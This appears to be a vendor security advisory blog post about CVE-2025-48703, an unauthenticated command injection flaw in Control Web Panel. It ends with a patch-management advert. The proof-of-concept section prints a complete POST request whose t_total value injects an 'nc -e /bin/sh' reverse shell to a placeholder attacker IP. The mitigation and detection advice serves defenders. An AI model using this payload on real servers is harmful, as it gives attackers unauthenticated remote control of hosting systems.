You are currently viewing Control Web Panel Breached: Critical RCE Exploited in the Wild

Control Web Panel Breached: Critical RCE Exploited in the Wild

  • Post author:
  • Reading time:4 mins read

A critical vulnerability has been identified in Control Web Panel (CWP), a widely used web hosting control panel also known as CentOS Web Panel, which is now under active exploitation. The Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert regarding this vulnerability, identified as CVE-2025-48703, emphasizing the urgency for system administrators to apply necessary patches and mitigations.

Affected Products

The vulnerability affects Control Web Panel (CWP) versions before 0.9.8.1205. CWP is a server management software popular among virtual private server (VPS) and dedicated server operators. It is designed for managing servers running on CentOS and its community-driven successors like Rocky Linux and AlmaLinux.

Vulnerability Details

CVE-2025-48703 is a critical OS Command Injection flaw that allows unauthenticated remote code execution through shell metacharacters in the t_total parameter within a filemanager changePerm request. An attacker can inject shell metacharacters into this parameter, bypassing input validation and executing arbitrary commands with the privileges of the web panel process. This vulnerability is classified as CWE-78, which relates to improper neutralization of special elements in an OS command.

Root Cause

Two implementation defects combine to allow full exploitation:

Unsafe shell invocation: the t_total parameter is concatenated into a shell command used to invoke chmod without adequate validation or escaping, so attacker-controlled input can inject extra shell commands. The combination of these issues lets a remote actor submit a crafted request that both bypasses authentication checks and causes arbitrary command execution.

Authentication/parameter handling flaw: the changePerm handler processes requests even when the per-user identifier in the URL is omitted or manipulated, allowing unauthenticated requests to reach code paths that expect an authenticated user.

Proof of Concept (PoC)

Maxime Rinaudo demonstrated the exploit by sending a POST request to the file-manager changePerm endpoint with a crafted t_total parameter. This injects a shell command and spawns a reverse shell as the target user.

Below is a sample POST request that triggers command injection:

POST /index.php?module=filemanager&file=changePerm HTTP/1.1
 Host: [CWP_INSTANCE]
 Cookie: pma_lang=en;PHPSESSID=[SESSION_ID]
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
 Content-Length: 63
 Content-Type: application/x-www-form-urlencoded
 

 acc=changePerm&user=[USERNAME]&file=%2Ftest.txt&t_total=777%3Bnc+-e+%2Fbin%2Fsh+[ATTACKER_IP]+4444

Impact & Exploit Potential

Successful exploitation of CVE-2025-48703 can lead to complete server compromise, potentially granting unauthorized access to sensitive data. An attacker could deploy web shells, establish persistence, move laterally within the network, or escalate privileges based on local misconfigurations. What makes this vulnerability particularly dangerous is that it requires no authentication to exploit, meaning any attacker with network access to the vulnerable system can potentially compromise it.

Tactics, Techniques, and Procedures (TTPs)

Attackers exploit this vulnerability by injecting shell metacharacters into the t_total parameter, which allows them to bypass input validation and execute arbitrary commands. The MITRE ATT&CK framework provides a structured way to understand these attacker behaviors:

Tactics and Techniques:

  • TA0002 – Execution: Adversaries attempt to run malicious code. Exploitation of a command injection vulnerability is a common way to execute code on a target system.
  • T1203 – Exploitation for Client Execution: Exploit software vulnerability to run malicious code on a local system.

Mitigation & Recommendations

To mitigate the risk associated with CVE-2025-48703, the following actions are recommended:

  • Upgrade CWP: Upgrade to version 0.9.8.1205 or later, which includes the patch for this vulnerability.
  • Restrict Access: Limit access to port 2083 (the user interface) to trusted IPs only.
  • Monitor for Compromise: Look for signs of compromise such as unexpected reverse shell connections, suspicious chmod executions in logs, new or modified .bashrc.ssh, or cron entries, connections to unfamiliar IP addresses, and unknown user accounts. If any such indicators are found, isolate the host, preserve logs, and initiate a forensic investigation.
  • Implement Intrusion Detection Systems: Use intrusion detection systems to detect and block exploitation attempts.
  • CISA Mitigation Deadline: CISA has set a mandatory response deadline of November 25, 2025, for Federal Civilian Executive Branch (FCEB) agencies to apply necessary fixes. All organizations should treat this as a high priority.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.